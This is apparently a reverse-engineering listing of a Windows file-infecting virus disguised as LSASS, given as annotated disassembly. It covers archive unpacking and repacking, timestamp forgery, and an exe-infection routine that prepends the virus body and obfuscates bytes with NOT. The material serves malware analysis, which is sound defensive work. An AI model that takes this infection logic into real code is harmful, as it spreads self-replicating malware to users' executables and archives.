0040277F |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402783 |. E8 745D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402788 |. 8D45 D4 |LEA EAX,DWORD PTR SS:[EBP-2C]
0040278B |. 50 |PUSH EAX
0040278C |. 8D86 A6010000 |LEA EAX,DWORD PTR DS:[ESI+1A6]
00402792 |. 50 |PUSH EAX
00402793 |. 8D85 38FFFFFF |LEA EAX,DWORD PTR SS:[EBP-C8]
00402799 |. 50 |PUSH EAX
0040279A |. E8 895E0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>
0040279F |. FF30 |PUSH DWORD PTR DS:[EAX] ; /src
004027A1 |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |
004027A7 |. 50 |PUSH EAX ; |dest
004027A8 |. E8 5F5F0000 |CALL <JMP.&MSVCRT.strcpy> ; /strcpy
004027AD |. 59 |POP ECX
004027AE |. 59 |POP ECX
004027AF |. 8D8D 38FFFFFF |LEA ECX,DWORD PTR SS:[EBP-C8]
004027B5 |. E8 425D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004027BA |. 53 |PUSH EBX ; /Arg5
004027BB |. 53 |PUSH EBX ; |Arg4
004027BC |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |
004027C2 |. 53 |PUSH EBX ; |Arg3
004027C3 |. 50 |PUSH EAX ; |Arg2
004027C4 |. 53 |PUSH EBX ; |Arg1
004027C5 |. 8BCE |MOV ECX,ESI ; |
004027C7 |. E8 2F410000 |CALL LSASS.004068FB ; /LSASS.004068FB
004027CC |. 85C0 |TEST EAX,EAX ; unpack rar/zip file
004027CE |. 74 40 |JE SHORT LSASS.00402810
004027D0 |. 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"
004027D5 |. 8D85 64FFFFFF |LEA EAX,DWORD PTR SS:[EBP-9C]
004027DB |. 57 |PUSH EDI
004027DC |. 50 |PUSH EAX
004027DD |. E8 4C5E0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004027E2 |. 51 |PUSH ECX
004027E3 |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]
004027E9 |. 8BCC |MOV ECX,ESP
004027EB |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP
004027EE |. 52 |PUSH EDX
004027EF |. 50 |PUSH EAX
004027F0 |. 51 |PUSH ECX
004027F1 |. C645 FC 1F |MOV BYTE PTR SS:[EBP-4],1F
004027F5 |. E8 345E0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004027FA |. 8BCE |MOV ECX,ESI
004027FC |. E8 E0F5FFFF |CALL LSASS.00401DE1
00402801 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402805 |. 8D8D 64FFFFFF |LEA ECX,DWORD PTR SS:[EBP-9C]
0040280B |. E9 B5020000 |JMP LSASS.00402AC5
00402810 |> A1 08F44000 |MOV EAX,DWORD PTR DS:[40F408]
00402815 |. 51 |PUSH ECX
00402816 |. 8945 E4 |MOV DWORD PTR SS:[EBP-1C],EAX
00402819 |. A1 04F44000 |MOV EAX,DWORD PTR DS:[40F404]
0040281E |. FF86 AA010000 |INC DWORD PTR DS:[ESI+1AA]
00402824 |. 8945 D0 |MOV DWORD PTR SS:[EBP-30],EAX
00402827 |. 8D45 DC |LEA EAX,DWORD PTR SS:[EBP-24]
0040282A |. 8BCC |MOV ECX,ESP
0040282C |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP
0040282F |. 50 |PUSH EAX
00402830 |. E8 D55D0000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>
00402835 |. 8BCE |MOV ECX,ESI
00402837 |. E8 85F8FFFF |CALL LSASS.004020C1
0040283C |. 8B45 D0 |MOV EAX,DWORD PTR SS:[EBP-30]
0040283F |. 3905 04F44000 |CMP DWORD PTR DS:[40F404],EAX
00402845 |. 7F 4B |JG SHORT LSASS.00402892
00402847 |. 8B45 E4 |MOV EAX,DWORD PTR SS:[EBP-1C]
0040284A |. 3905 08F44000 |CMP DWORD PTR DS:[40F408],EAX
00402850 |. 7F 40 |JG SHORT LSASS.00402892
00402852 |. 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"
00402857 |. 8D85 5CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-A4]
0040285D |. 57 |PUSH EDI
0040285E |. 50 |PUSH EAX
0040285F |. E8 CA5D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402864 |. 51 |PUSH ECX
00402865 |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]
0040286B |. 8BCC |MOV ECX,ESP
0040286D |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP
00402870 |. 52 |PUSH EDX
00402871 |. 50 |PUSH EAX
00402872 |. 51 |PUSH ECX
00402873 |. C645 FC 26 |MOV BYTE PTR SS:[EBP-4],26
00402877 |. E8 B25D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
0040287C |. 8BCE |MOV ECX,ESI
0040287E |. E8 5EF5FFFF |CALL LSASS.00401DE1
00402883 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402887 |. 8D8D 5CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-A4]
0040288D |. E9 C2010000 |JMP LSASS.00402A54
00402892 |> 8D45 D8 |LEA EAX,DWORD PTR SS:[EBP-28]
00402895 |. 50 |PUSH EAX
00402896 |. 8D85 78FFFFFF |LEA EAX,DWORD PTR SS:[EBP-88]
0040289C |. 68 6CD14000 |PUSH LSASS.0040D16C ; ASCII " A ""
004028A1 |. 50 |PUSH EAX
004028A2 |. E8 8D5D0000 |CALL <JMP.&MFC42.#926_??H@YG?AVCString@@PBDABV0@@Z>
004028A7 |. 68 88D14000 |PUSH LSASS.0040D188 ; ASCII "" ""
004028AC |. 50 |PUSH EAX
004028AD |. 8D45 80 |LEA EAX,DWORD PTR SS:[EBP-80]
004028B0 |. C645 FC 20 |MOV BYTE PTR SS:[EBP-4],20
004028B4 |. 50 |PUSH EAX
004028B5 |. E8 745D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004028BA |. 8D4D DC |LEA ECX,DWORD PTR SS:[EBP-24]
004028BD |. C645 FC 21 |MOV BYTE PTR SS:[EBP-4],21
004028C1 |. 51 |PUSH ECX
004028C2 |. 50 |PUSH EAX
004028C3 |. 8D45 88 |LEA EAX,DWORD PTR SS:[EBP-78]
004028C6 |. 50 |PUSH EAX
004028C7 |. E8 5C5D0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>
004028CC |. 68 44D14000 |PUSH LSASS.0040D144 ; ASCII "*.*" -r -inul -ibck -y -m0 -df -ep -ep1"
004028D1 |. 50 |PUSH EAX
004028D2 |. 8D45 90 |LEA EAX,DWORD PTR SS:[EBP-70]
004028D5 |. C645 FC 22 |MOV BYTE PTR SS:[EBP-4],22
004028D9 |. 50 |PUSH EAX
004028DA |. E8 4F5D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004028DF |. 50 |PUSH EAX
004028E0 |. 8D4D D4 |LEA ECX,DWORD PTR SS:[EBP-2C]
004028E3 |. C645 FC 23 |MOV BYTE PTR SS:[EBP-4],23
004028E7 |. E8 365D0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
004028EC |. 8D4D 90 |LEA ECX,DWORD PTR SS:[EBP-70]
004028EF |. C645 FC 22 |MOV BYTE PTR SS:[EBP-4],22
004028F3 |. E8 045C0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004028F8 |. 8D4D 88 |LEA ECX,DWORD PTR SS:[EBP-78]
004028FB |. C645 FC 21 |MOV BYTE PTR SS:[EBP-4],21
004028FF |. E8 F85B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402904 |. 8D4D 80 |LEA ECX,DWORD PTR SS:[EBP-80]
00402907 |. C645 FC 20 |MOV BYTE PTR SS:[EBP-4],20
0040290B |. E8 EC5B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402910 |. 8D8D 78FFFFFF |LEA ECX,DWORD PTR SS:[EBP-88]
00402916 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
0040291A |. E8 DD5B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
0040291F |. 8B85 00FEFFFF |MOV EAX,DWORD PTR SS:[EBP-200]
00402925 |. 53 |PUSH EBX
00402926 |. 8945 98 |MOV DWORD PTR SS:[EBP-68],EAX
00402929 |. 8B85 04FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1FC]
0040292F |. 8945 9C |MOV DWORD PTR SS:[EBP-64],EAX
00402932 |. 8B85 F8FDFFFF |MOV EAX,DWORD PTR SS:[EBP-208]
00402938 |. 8945 B0 |MOV DWORD PTR SS:[EBP-50],EAX
0040293B |. 8B85 FCFDFFFF |MOV EAX,DWORD PTR SS:[EBP-204]
00402941 |. 8945 B4 |MOV DWORD PTR SS:[EBP-4C],EAX
00402944 |. 8B85 08FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F8]
0040294A |. 8945 A4 |MOV DWORD PTR SS:[EBP-5C],EAX
0040294D |. 8B85 0CFEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F4]
00402953 |. 51 |PUSH ECX
00402954 |. 8945 A8 |MOV DWORD PTR SS:[EBP-58],EAX
00402957 |. 8D8D 20FEFFFF |LEA ECX,DWORD PTR SS:[EBP-1E0]
0040295D |. 8BC4 |MOV EAX,ESP
0040295F |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP
00402962 |. 51 |PUSH ECX
00402963 |. 8D4D 08 |LEA ECX,DWORD PTR SS:[EBP+8]
00402966 |. 51 |PUSH ECX
00402967 |. 50 |PUSH EAX
00402968 |. E8 C15C0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
0040296D |. E8 4FF4FFFF |CALL LSASS.00401DC1
00402972 |. 59 |POP ECX
00402973 |. 8D45 D4 |LEA EAX,DWORD PTR SS:[EBP-2C]
00402976 |. 59 |POP ECX
00402977 |. 50 |PUSH EAX
00402978 |. 8D86 A6010000 |LEA EAX,DWORD PTR DS:[ESI+1A6]
0040297E |. 50 |PUSH EAX
0040297F |. 8D85 70FFFFFF |LEA EAX,DWORD PTR SS:[EBP-90]
00402985 |. 50 |PUSH EAX
00402986 |. E8 9D5C0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>
0040298B |. FF30 |PUSH DWORD PTR DS:[EAX] ; /src
0040298D |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |
00402993 |. 50 |PUSH EAX ; |dest
00402994 |. E8 735D0000 |CALL <JMP.&MSVCRT.strcpy> ; /strcpy
00402999 |. 59 |POP ECX
0040299A |. 59 |POP ECX
0040299B |. 8D8D 70FFFFFF |LEA ECX,DWORD PTR SS:[EBP-90]
004029A1 |. E8 565B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004029A6 |. 53 |PUSH EBX ; /Arg5
004029A7 |. 53 |PUSH EBX ; |Arg4
004029A8 |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |
004029AE |. 53 |PUSH EBX ; |Arg3
004029AF |. 50 |PUSH EAX ; |Arg2
004029B0 |. 53 |PUSH EBX ; |Arg1
004029B1 |. 8BCE |MOV ECX,ESI ; |
004029B3 |. E8 433F0000 |CALL LSASS.004068FB ; /LSASS.004068FB
004029B8 |. 85C0 |TEST EAX,EAX ; pack rar/zip file
004029BA |. 75 5D |JNZ SHORT LSASS.00402A19
004029BC |. 8D4D C0 |LEA ECX,DWORD PTR SS:[EBP-40]
004029BF |. E8 445B0000 |CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
004029C4 |. 68 40D14000 |PUSH LSASS.0040D140 ; ASCII "ddd"
004029C9 |. 8D4D C0 |LEA ECX,DWORD PTR SS:[EBP-40]
004029CC |. C645 FC 24 |MOV BYTE PTR SS:[EBP-4],24
004029D0 |. E8 475C0000 |CALL <JMP.&MFC42.#860_??4CString@@QAEABV0@PBD@Z>
004029D5 |. 53 |PUSH EBX ; /hTemplateFile
004029D6 |. 68 80000000 |PUSH 80 ; |Attributes = NORMAL
004029DB |. 6A 03 |PUSH 3 ; |Mode = OPEN_EXISTING
004029DD |. 53 |PUSH EBX ; |pSecurity
004029DE |. 6A 03 |PUSH 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
004029E0 |. 68 000000C0 |PUSH C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
004029E5 |. FF75 D8 |PUSH DWORD PTR SS:[EBP-28] ; |FileName
004029E8 |. FF15 E8A04000 |CALL DWORD PTR DS:[<&KERNEL32.CreateFileA>] ; /CreateFileA
004029EE |. 8D4D A4 |LEA ECX,DWORD PTR SS:[EBP-5C]
004029F1 |. 8945 E4 |MOV DWORD PTR SS:[EBP-1C],EAX
004029F4 |. 51 |PUSH ECX ; /pLastWrite
004029F5 |. 8D4D 98 |LEA ECX,DWORD PTR SS:[EBP-68] ; |
004029F8 |. 51 |PUSH ECX ; |pLastAccess
004029F9 |. 8D4D B0 |LEA ECX,DWORD PTR SS:[EBP-50] ; |
004029FC |. 51 |PUSH ECX ; |pCreationTime
004029FD |. 50 |PUSH EAX ; |hFile
004029FE |. FF15 14A14000 |CALL DWORD PTR DS:[<&KERNEL32.SetFileTime>] ; /SetFileTime
00402A04 |. FF75 E4 |PUSH DWORD PTR SS:[EBP-1C] ; /hObject
00402A07 |. FF15 74A04000 |CALL DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; /CloseHandle
00402A0D |. 8D4D C0 |LEA ECX,DWORD PTR SS:[EBP-40]
00402A10 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402A14 |. E8 E35A0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402A19 |> 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"
00402A1E |. 8D85 68FFFFFF |LEA EAX,DWORD PTR SS:[EBP-98]
00402A24 |. 57 |PUSH EDI
00402A25 |. 50 |PUSH EAX
00402A26 |. E8 035C0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402A2B |. 51 |PUSH ECX
00402A2C |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]
00402A32 |. 8BCC |MOV ECX,ESP
00402A34 |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP
00402A37 |. 52 |PUSH EDX
00402A38 |. 50 |PUSH EAX
00402A39 |. 51 |PUSH ECX
00402A3A |. C645 FC 25 |MOV BYTE PTR SS:[EBP-4],25
00402A3E |. E8 EB5B0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402A43 |. 8BCE |MOV ECX,ESI
00402A45 |. E8 97F3FFFF |CALL LSASS.00401DE1
00402A4A |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402A4E |. 8D8D 68FFFFFF |LEA ECX,DWORD PTR SS:[EBP-98]
00402A54 |> E8 A35A0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402A59 |. FF8E AA010000 |DEC DWORD PTR DS:[ESI+1AA]
00402A5F |. EB 69 |JMP SHORT LSASS.00402ACA
00402A61 |> 81BD 14FEFFFF 00>|CMP DWORD PTR SS:[EBP-1EC],19000
00402A6B |. 73 5D |JNB SHORT LSASS.00402ACA
...
00402ABB |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402ABF |. 8D8D 60FFFFFF |LEA ECX,DWORD PTR SS:[EBP-A0]
00402AC5 |> E8 325A0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402ACA |> 8D85 F4FDFFFF |LEA EAX,DWORD PTR SS:[EBP-20C]
00402AD0 |. 50 |PUSH EAX ; /pFindFileData
00402AD1 |. FF75 B8 |PUSH DWORD PTR SS:[EBP-48] ; |hFile
00402AD4 |. FF15 FCA04000 |CALL DWORD PTR DS:[<&KERNEL32.FindNextFileA>] ; /FindNextFileA
00402ADA |. 85C0 |TEST EAX,EAX
00402ADC |.^ 0F85 52F7FFFF /JNZ LSASS.00402234
00402AE2 |. FF75 B8 PUSH DWORD PTR SS:[EBP-48] ; /hSearch
00402AE5 |. FF15 F8A04000 CALL DWORD PTR DS:[<&KERNEL32.FindClose>] ; /FindClose
2 感染exe文件的函数
00406348 /$ B8 94934000 MOV EAX,LSASS.00409394 ; exe file infect function
0040634D |. E8 AE230000 CALL <JMP.&MSVCRT._EH_prolog>
00406352 |. 83EC 3C SUB ESP,3C
00406355 |. 53 PUSH EBX
00406356 |. 56 PUSH ESI
00406357 |. 8BF1 MOV ESI,ECX
00406359 |. 57 PUSH EDI
0040635A |. 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24]
0040635D |. E8 A6210000 CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
00406362 |. 8365 FC 00 AND DWORD PTR SS:[EBP-4],0
00406366 |. 8D86 74010000 LEA EAX,DWORD PTR DS:[ESI+174]
0040636C |. 50 PUSH EAX
0040636D |. 8D8E 6C010000 LEA ECX,DWORD PTR DS:[ESI+16C]
00406373 |. E8 AA220000 CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
00406378 |. 8D45 B8 LEA EAX,DWORD PTR SS:[EBP-48]
0040637B |. 8D7E 68 LEA EDI,DWORD PTR DS:[ESI+68]
0040637E |. 50 PUSH EAX ; /statbuf
0040637F |. 57 PUSH EDI ; |path
00406380 |. FF15 80A34000 CALL DWORD PTR DS:[<&MSVCRT._stat>] ; /_stat
00406386 |. 8B45 CC MOV EAX,DWORD PTR SS:[EBP-34] ; get file com/lsass.exe base info
00406389 |. 59 POP ECX
0040638A |. 85C0 TEST EAX,EAX
0040638C |. 59 POP ECX
0040638D |. A3 3CD04000 MOV DWORD PTR DS:[40D03C],EAX
00406392 |. 75 07 JNZ SHORT LSASS.0040639B
00406394 |> 32DB XOR BL,BL
00406396 |. E9 13010000 JMP LSASS.004064AE
0040639B |> 50 PUSH EAX ; /size
0040639C |. FF15 88A34000 CALL DWORD PTR DS:[<&MSVCRT.malloc>] ; /malloc
004063A2 |. 85C0 TEST EAX,EAX ; allocate a memory
004063A4 |. 59 POP ECX
004063A5 |. 8986 70010000 MOV DWORD PTR DS:[ESI+170],EAX ; buf
004063AB |.^ 74 E7 JE SHORT LSASS.00406394
004063AD |. 68 E8D14000 PUSH LSASS.0040D1E8 ; /mode = "rb"
004063B2 |. 57 PUSH EDI ; |path
004063B3 |. 8B3D 84A34000 MOV EDI,DWORD PTR DS:[<&MSVCRT.fopen>] ; |msvcrt.fopen
004063B9 |. FFD7 CALL EDI ; /fopen
004063BB |. 59 POP ECX ; open file com/lsass.exe
004063BC |. 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX
004063BF |. 85C0 TEST EAX,EAX
004063C1 |. 59 POP ECX
004063C2 |. 0F84 D7000000 JE LSASS.0040649F ; read file com/lsass.exe to buf
004063C8 |. 50 PUSH EAX ; /stream
004063C9 |. 8B1D 8CA34000 MOV EBX,DWORD PTR DS:[<&MSVCRT.fread>] ; |msvcrt.fread
004063CF |. FF35 3CD04000 PUSH DWORD PTR DS:[40D03C] ; |n = 27004 (159748.)
004063D5 |. 6A 01 PUSH 1 ; |size = 1
004063D7 |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; |buf
004063DD |. FFD3 CALL EBX ; /fread
004063DF |. FF75 E0 PUSH DWORD PTR SS:[EBP-20] ; /stream
004063E2 |. 8945 E8 MOV DWORD PTR SS:[EBP-18],EAX ; |
004063E5 |. FF15 90A34000 CALL DWORD PTR DS:[<&MSVCRT.fclose>] ; /fclose
004063EB |. 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18] ; close file handle
004063EE |. 83C4 14 ADD ESP,14
004063F1 |. 3B05 3CD04000 CMP EAX,DWORD PTR DS:[40D03C]
004063F7 |. 0F85 A2000000 JNZ LSASS.0040649F
004063FD |. 8B86 74010000 MOV EAX,DWORD PTR DS:[ESI+174]
00406403 |. 8D4D B8 LEA ECX,DWORD PTR SS:[EBP-48]
00406406 |. 51 PUSH ECX ; /statbuf
00406407 |. 50 PUSH EAX ; |path
00406408 |. FF15 80A34000 CALL DWORD PTR DS:[<&MSVCRT._stat>] ; /_stat
0040640E |. 59 POP ECX ; get need infect file base info to statbuf
0040640F |. 85C0 TEST EAX,EAX
00406411 |. 59 POP ECX
00406412 |. 0F85 74020000 JNZ LSASS.0040668C
00406418 |. 3945 CC CMP DWORD PTR SS:[EBP-34],EAX
0040641B |. 0F84 6B020000 JE LSASS.0040668C
00406421 |. 8BCE MOV ECX,ESI
00406423 |. E8 DA020000 CALL LSASS.00406702 ; LoadResource here
00406428 |. 84C0 TEST AL,AL
0040642A |. 74 73 JE SHORT LSASS.0040649F
0040642C |. 8B86 74010000 MOV EAX,DWORD PTR DS:[ESI+174] ; the file can be infected
00406432 |. 68 E8D14000 PUSH LSASS.0040D1E8 ; ASCII "rb"
00406437 |. 50 PUSH EAX
00406438 |. FFD7 CALL EDI ; open need infect file
0040643A |. 59 POP ECX ; file path
0040643B |. 8945 E4 MOV DWORD PTR SS:[EBP-1C],EAX ; need infect file handle
0040643E |. 85C0 TEST EAX,EAX
00406440 |. 59 POP ECX
00406441 |. 74 5C JE SHORT LSASS.0040649F
00406443 |. 51 PUSH ECX
00406444 |. 8D86 74010000 LEA EAX,DWORD PTR DS:[ESI+174]
0040644A |. 8BCC MOV ECX,ESP
0040644C |. 8965 E0 MOV DWORD PTR SS:[EBP-20],ESP
0040644F |. 50 PUSH EAX
00406450 |. E8 B5210000 CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>
00406455 |. E8 2ECCFFFF CALL LSASS.00403088 ; check file whether is infected function
0040645A |. 84C0 TEST AL,AL
0040645C |. 59 POP ECX
0040645D |. 74 1B JE SHORT LSASS.0040647A ; jmp if can infected
0040645F |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block
00406465 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free
0040646B |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; /stream
0040646E |. FF15 90A34000 CALL DWORD PTR DS:[<&MSVCRT.fclose>] ; /fclose
00406474 |. 59 POP ECX
00406475 |. B3 01 MOV BL,1
00406477 |. 59 POP ECX
00406478 |. EB 34 JMP SHORT LSASS.004064AE
0040647A |> 6A 00 PUSH 0 ; /whence = SEEK_SET
0040647C |. 6A 00 PUSH 0 ; |offset = 0
0040647E |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; |stream
00406481 |. FF15 44A34000 CALL DWORD PTR DS:[<&MSVCRT.fseek>] ; /fseek
00406487 |. 8B86 7C010000 MOV EAX,DWORD PTR DS:[ESI+17C] ; set need file ptr as 0
0040648D |. 68 D8DD4000 PUSH LSASS.0040DDD8 ; ASCII "wb"
00406492 |. 50 PUSH EAX ; create a temporary file: system32/com/~
00406493 |. FFD7 CALL EDI ; fopen
00406495 |. 83C4 14 ADD ESP,14
00406498 |. 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX ; com/~ handle
0040649B |. 85C0 TEST EAX,EAX
0040649D |. 75 22 JNZ SHORT LSASS.004064C1
0040649F |> FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block
004064A5 |. 32DB XOR BL,BL ; |
004064A7 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free
004064AD |. 59 POP ECX
004064AE |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
004064B2 |. 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24]
004064B5 |. E8 42200000 CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004064BA |. 8AC3 MOV AL,BL
004064BC |. E9 E6010000 JMP LSASS.004066A7
004064C1 |> 50 PUSH EAX ; /write self-virus file to temporary file(com/~)
004064C2 |. 8B3D 48A34000 MOV EDI,DWORD PTR DS:[<&MSVCRT.fwrite>] ; |msvcrt.fwrite
004064C8 |. FF75 E8 PUSH DWORD PTR SS:[EBP-18] ; |n
004064CB |. 6A 01 PUSH 1 ; |size = 1
004064CD |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; |ptr
004064D3 |. FFD7 CALL EDI ; /fwrite
004064D5 |. FF75 E0 PUSH DWORD PTR SS:[EBP-20]
004064D8 |. 8945 E8 MOV DWORD PTR SS:[EBP-18],EAX
004064DB |. 8D45 CC LEA EAX,DWORD PTR SS:[EBP-34]
004064DE |. 6A 04 PUSH 4 ; write 4 bytes to file com/~
004064E0 |. 6A 01 PUSH 1
004064E2 |. 50 PUSH EAX
004064E3 |. FFD7 CALL EDI ; fwrite
004064E5 |. FF75 E0 PUSH DWORD PTR SS:[EBP-20]
004064E8 |. 0145 E8 ADD DWORD PTR SS:[EBP-18],EAX
004064EB |. 8D45 DC LEA EAX,DWORD PTR SS:[EBP-24]
004064EE |. 6A 04 PUSH 4 ; write 4 bytes to file com/~
004064F0 |. 6A 01 PUSH 1
004064F2 |. 50 PUSH EAX
004064F3 |. FFD7 CALL EDI ; fwrite
004064F5 |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; filestream
004064F8 |. 0145 E8 ADD DWORD PTR SS:[EBP-18],EAX
004064FB |. C645 F3 01 MOV BYTE PTR SS:[EBP-D],1
004064FF |. FF35 3CD04000 PUSH DWORD PTR DS:[40D03C] ; read all need infect file
00406505 |. 6A 01 PUSH 1
00406507 |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; rBuf
0040650D |. FFD3 CALL EBX ; fread
0040650F |. 83C4 40 ADD ESP,40 ;
00406512 |> 85C0 /TEST EAX,EAX ; EXA initial value = 0x1c000(need infect file
size)
00406514 |. 0F84 8B000000 |JE LSASS.004065A5
0040651A |. 807D F3 00 |CMP BYTE PTR SS:[EBP-D],0 ; flag
0040651E |. 74 59 |JE SHORT LSASS.00406579
00406520 |. 8B0D 30D04000 |MOV ECX,DWORD PTR DS:[40D030] ; save inital postion to ECX
00406526 |. 83C1 09 |ADD ECX,9 ; ECX += 9; 224
00406529 |> 3B0D 3CD04000 |/CMP ECX,DWORD PTR DS:[40D03C]
0040652F |. 894D EC ||MOV DWORD PTR SS:[EBP-14],ECX ; dwTmp = ECX
00406532 |. 73 16 ||JNB SHORT LSASS.0040654A ; if ECX > [40D03C](self-virus size) then jmp;
00406534 |. 8B96 70010000 ||MOV EDX,DWORD PTR DS:[ESI+170] ; inital postion is first byte of need infect file
0040653A |. 03CA ||ADD ECX,EDX
0040653C |. 8A11 ||MOV DL,BYTE PTR DS:[ECX] ; get [ECX]
0040653E |. F6D2 ||NOT DL
00406540 |. 8811 ||MOV BYTE PTR DS:[ECX],DL ; modified, then save back
00406542 |. 8B4D EC ||MOV ECX,DWORD PTR SS:[EBP-14] ; ECX = dwTmp
00406545 |. 83C1 0B ||ADD ECX,0B ; ECX += 0x0B; offset = 0x0B
00406548 |.^ EB DF |/JMP SHORT LSASS.00406529
0040654A |> 33C9 |XOR ECX,ECX ; ECX = 0;
0040654C |. 390D 3CD04000 |CMP DWORD PTR DS:[40D03C],ECX
00406552 |. 894D EC |MOV DWORD PTR SS:[EBP-14],ECX ; dwTmp = ECX;
00406555 |. 76 1E |JBE SHORT LSASS.00406575 ; if [40D03C] <= ECX then jmp;
00406557 |> 8B96 70010000 |/MOV EDX,DWORD PTR DS:[ESI+170] ; inital postion is first byte of need infect file
0040655D |. 03CA ||ADD ECX,EDX ; ECX += EDX;
0040655F |. 8A11 ||MOV DL,BYTE PTR DS:[ECX] ; get [ECX]
00406561 |. F6D2 ||NOT DL
00406563 |. 8811 ||MOV BYTE PTR DS:[ECX],DL ; midified, then save back
00406565 |. 8B4D EC ||MOV ECX,DWORD PTR SS:[EBP-14] ; ECX = dwTmp;
00406568 |. 41 ||INC ECX
00406569 |. 41 ||INC ECX ; ECX += 2;
0040656A |. 3B0D 3CD04000 ||CMP ECX,DWORD PTR DS:[40D03C]
00406570 |. 894D EC ||MOV DWORD PTR SS:[EBP-14],ECX ; dwTmp = ECX;
00406573 |.^ 72 E2 |/JB SHORT LSASS.00406557 ; if ECX < [40D03C](self-virus size) then jmp
(continue decode);
00406575 |> 8065 F3 00 |AND BYTE PTR SS:[EBP-D],0 ; then decode over, write to temporary file
00406579 |> FF75 E0 |PUSH DWORD PTR SS:[EBP-20] ; write to file com/~
0040657C |. 50 |PUSH EAX
0040657D |. 6A 01 |PUSH 1
0040657F |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]
00406585 |. FFD7 |CALL EDI ; fwrite
00406587 |. FF75 E4 |PUSH DWORD PTR SS:[EBP-1C]
0040658A |. 0145 E8 |ADD DWORD PTR SS:[EBP-18],EAX
0040658D |. FF35 3CD04000 |PUSH DWORD PTR DS:[40D03C]
00406593 |. 6A 01 |PUSH 1
00406595 |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]
0040659B |. FFD3 |CALL EBX ; fread
0040659D |. 83C4 20 |ADD ESP,20
004065A0 |.^ E9 6DFFFFFF /JMP LSASS.00406512
